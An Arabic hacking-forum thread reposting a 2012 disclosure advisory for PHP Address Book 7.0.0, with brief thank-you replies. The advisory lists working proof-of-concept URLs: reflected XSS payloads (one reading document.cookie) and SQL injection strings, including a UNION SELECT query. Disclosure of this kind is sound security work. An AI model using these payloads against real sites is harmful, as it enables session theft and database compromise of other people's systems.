ثغرة جديده { PHP Address Book 7.0.0 Multiple Vulnerabilities }

ثغرة جديده { PHP Address Book 7.0.0 Multiple Vulnerabilities }


النتائج 1 إلى 3 من 3

الموضوع: ثغرة جديده { PHP Address Book 7.0.0 Multiple Vulnerabilities }

  1. #1

    Gadid ثغرة جديده { PHP Address Book 7.0.0 Multiple Vulnerabilities }

    [
    بسم الله الرحمن الرحيم


    ################################################## ################################
    # Advisory: PHP Address Book 7.0.0 Multiple security vulnerabilities
    # Advisory ID: SSCHADV2012-013
    # Author: Stefan Schurtz
    # Affected Software: Successfully tested on PHP Address Book 7.0.0
    # Vendor URL: http://sourceforge.net/projects/php-addressbook/
    # Vendor Status: informed
    ################################################## ################################

    ==========================
    Vulnerability Description
    ==========================

    PHP Address Book 7.0.0 is prone to multiple XSS and SQLi vulnerabilities

    ==================
    PoC-Exploit
    ==================

    // XSS

    http://[target]/addressbookv7.0.0/preferences.php?from='"</script>**********alert('xss')</script>
    http://[target]/addressbookv7.0.0/group.php/" />********** alert('xss')</script>
    http://[target]/addressbookv7.0.0/index.php?group='"</script>**********alert(document.cookie)</script>

    // SQLi

    http://[target]/addressbookv7.0.0/edit.php?id=1 AND 1=IF(1<2,2,1)
    http://[target]/addressbookv7.0.0/edit.php?id=1 AND 1=IF(1>2,2,1)

    // UNION-based Injection, needs 'magic_quotes=off'
    http://[target]/addressbookv7.0.0/view.php?id=1' UNION ALL SELECT NULL, NULL, version(), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL--+

    ====================
    Disclosure Timeline
    ====================

    03-Mar-2012 - vendor informed

    ========
    Credits
    ========

    Vulnerabilities found and advisory written by Stefan Schurtz.

    ===========
    References
    ===========

    http://sourceforge.net/tracker/?grou...4&atid=8059299
    http://www.darksecurity.de/advisorie...DV2012-013.txt


    رابط الثغرة : http://www.exploit-db.com/exploits/18899





    تحياتي

  2. #2
    :: مشرف قسم الباك تراك :: الصورة الرمزية يارب رحمتك
    تاريخ التسجيل
    May 2012
    الدولة
    روح العرب
    المشاركات
    1,147

    افتراضي رد: ثغرة جديده { PHP Address Book 7.0.0 Multiple Vulnerabilities }

    بصرآحة انا موِش عآرف آقول آية لمجهوٍِدك دا ....

    ربنا يحفظك ويزيدك من علْمو ...

    بآلتوفيق عزيزى


    youtube

    [ما يلفظ من قول الا لديه رقيب عتيد]
    [ آفعل مآ شئت فكمآ تديُن تدآن ]

    hacker ▎security ▎no Breach>>
    [ mohamed -kareb ]


  3. #3

    افتراضي رد: ثغرة جديده { PHP Address Book 7.0.0 Multiple Vulnerabilities }

    بصرآحة انا موِش عآرف آقول آية لمجهوٍِدك دا ....

    ربنا يحفظك ويزيدك من علْمو ...

    بآلتوفيق عزيزى
    ربي يعطيكـ العافيه
    شاكرلكـ على مروركـ

    تـحـيآتي

المواضيع المتشابهه

  1. ثغره جديده { Free Realty v3.1-0.6 Multiple Vulnerabilities }
    بواسطة اخلاقي تاج راسي في المنتدى قسم الثغرات
    مشاركات: 2
    آخر مشاركة: 05-24-2012, 05:11 AM
  2. ثغره جديده { Travelon Express CMS v6.2.2 Multiple Vulnerabilities }
    بواسطة اخلاقي تاج راسي في المنتدى قسم الثغرات
    مشاركات: 1
    آخر مشاركة: 05-14-2012, 01:46 PM
  3. ثغره جديده { Proman Xpress v5.0.1 Multiple Vulnerabilities }
    بواسطة اخلاقي تاج راسي في المنتدى قسم الثغرات
    مشاركات: 0
    آخر مشاركة: 05-14-2012, 05:52 AM
  4. ثغره جديده { Viscacha Forum CMS v0.8.1.1 Multiple Vulnerabilities }
    بواسطة اخلاقي تاج راسي في المنتدى قسم الثغرات
    مشاركات: 0
    آخر مشاركة: 05-14-2012, 05:48 AM
  5. ثغرة ابلود جديده
    بواسطة kad2006 في المنتدى قسم الثغرات
    مشاركات: 3
    آخر مشاركة: 01-15-2010, 05:48 PM

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •